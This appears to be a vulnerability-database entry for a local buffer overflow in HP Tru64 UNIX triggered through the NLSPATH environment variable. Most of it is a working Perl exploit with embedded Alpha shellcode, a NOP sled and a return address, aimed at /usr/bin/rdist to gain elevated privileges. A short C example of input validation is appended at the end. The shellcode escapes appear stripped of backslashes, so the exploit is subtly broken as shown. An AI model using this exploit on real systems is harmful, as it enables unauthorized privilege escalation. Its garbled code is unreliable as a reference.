HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (2)
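Vulnerability ID | 1053613 | Vulnerability type | |
Published | 2002-08-30 | Updated | 2002-08-30 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Unix | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)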
source: http://www.securityfocus.com/bid/5647/info
Tru64 is a commercially available UNIX operating system. Tru64 was originally developed by Digital and is now distributed and maintained by HP.
A buffer overflow has been discovered in a number of Tru64 binaries. Attackers may exploit this via an overly long value for the NLSPATH environment variable. Because of this flaw, a local attacker may be able to execute arbitrary instructions. As a result, the attacker may be able to execute malicious code and elevate privileges.
#!/usr/bin/perl -w
#
# based on work by stripey from back in the day
# kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";
print "Shellcode is " . length($sc) . " bytes long \n";
$tlen = (1024-(length($sc)))/4;
$ENV{"NLSPATH"} = "";
system("ulimit -c 10000");
# 0x14001019a Compaq Tru64 UNIX V5.0 (Rev. 910) (TruNastyWhore.localdomain)
$ret = "x9ax01x01x40x01";
$ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret;
exec("/usr/bin/rdist -c DMr0x");
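For the defensive side of the flaw described above, the following added example (not part of the original advisory or exploit, and not Tru64 source code) shows how a privileged program can validate an NLSPATH-style value before it reaches a fixed-size buffer. The names nls_value_check and CAT_PATH_MAX, the 1024-byte size and the printable-ASCII policy are assumptions made for illustration; the actual vulnerable code is not disclosed on this page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for illustration; the real Tru64 layout is not disclosed. */
#define CAT_PATH_MAX 1024

enum env_status { ENV_OK = 0, ENV_UNSET = 1, ENV_TOO_LONG = 2, ENV_BAD_BYTES = 3 };

/* Validate an environment value and copy it into a fixed buffer.
 * Oversized values are rejected, never truncated, and dst is left empty
 * on any failure so callers cannot use a partial path by mistake. */
enum env_status nls_value_check(const char *val, char *dst, size_t dstlen)
{
    size_t len, i;

    if (dst == NULL || dstlen == 0)
        return ENV_TOO_LONG;
    dst[0] = '\0';
    if (val == NULL)
        return ENV_UNSET;

    len = strlen(val);
    if (len >= dstlen)                 /* must leave room for the NUL */
        return ENV_TOO_LONG;

    /* Assumed policy: catalog search paths are printable ASCII text. */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)val[i];
        if (c < 0x20 || c > 0x7e)
            return ENV_BAD_BYTES;
    }
    memcpy(dst, val, len + 1);
    return ENV_OK;
}

int main(void)
{
    char path[CAT_PATH_MAX];
    enum env_status st = nls_value_check(getenv("NLSPATH"), path, sizeof path);

    if (st == ENV_TOO_LONG || st == ENV_BAD_BYTES) {
        fprintf(stderr, "NLSPATH rejected (status %d), using built-in default\n", (int)st);
        return 1;
    }
    printf("NLSPATH %s\n", st == ENV_OK ? path : "(unset)");
    return 0;
}
```

A set-user-ID program should perform this kind of check, or clear the variable outright, before calling any library routine that consults NLSPATH.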